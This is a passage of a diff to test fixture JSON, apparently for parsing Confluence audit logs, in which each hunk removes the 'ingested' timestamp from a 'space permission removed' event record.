user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6822,7 +6751,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837523660Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.311Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6910,7 +6838,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837524627Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.303Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6998,7 +6925,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837525537Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.295Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7086,7 +7012,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837526742Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.290Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7167,7 +7092,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837527775Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.285Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7255,7 +7179,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837528754Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.282Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7343,7 +7266,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837529679Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.278Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7431,7 +7353,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837530585Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.274Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7512,7 +7433,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837531481Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.270Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7600,7 +7520,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837532385Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.266Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7688,7 +7607,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837533299Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.262Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7776,7 +7694,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837534220Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.258Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7857,7 +7774,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837535225Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.254Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7945,7 +7861,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837536160Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.250Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8033,7 +7948,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837537087Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.246Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8121,7 +8035,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837538007Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.242Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8202,7 +8115,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837538878Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.238Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8290,7 +8202,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837539895Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.234Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8378,7 +8289,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837540860Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.230Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8466,7 +8376,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837541856Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.225Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8547,7 +8456,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837542875Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.221Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8635,7 +8543,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837544116Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.217Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8723,7 +8630,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837545081Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.212Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8811,7 +8717,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-24T00:46:29.837546086Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.208Z\",\"author\":{\"name\":\"test 